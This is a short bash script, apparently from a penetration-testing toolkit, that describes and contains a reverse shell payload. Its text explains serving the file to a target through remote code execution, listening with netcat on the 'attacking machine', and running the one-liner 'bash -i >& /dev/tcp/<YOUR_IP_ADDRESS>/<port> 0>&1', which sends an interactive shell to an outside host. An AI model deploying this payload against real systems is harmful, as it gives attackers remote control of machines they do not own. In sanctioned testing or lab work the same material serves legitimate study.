#!/bin/bash

echo "
## Description
This script will open up a bash shell for the targeted server and send it to the IP address and port specified. Typically, this would be the IP Address and the port that you are running a netcat listener on.

## Special Usage Notes

- Need to have a netcat listener running on your attacking machine
    - IP_ADDRESS above is the IP of said machine
- You can serve this file using a very basic webserver on your local machine. Then, via some form of remote code execution, you can get a targeted box to request this served file and execute it. If all goes well, your netcat listener should recieve the open shell.


#!/bin/bash
bash -i >& /dev/tcp/<YOUR_IP_ADDRESS>/<port> 0>&1
"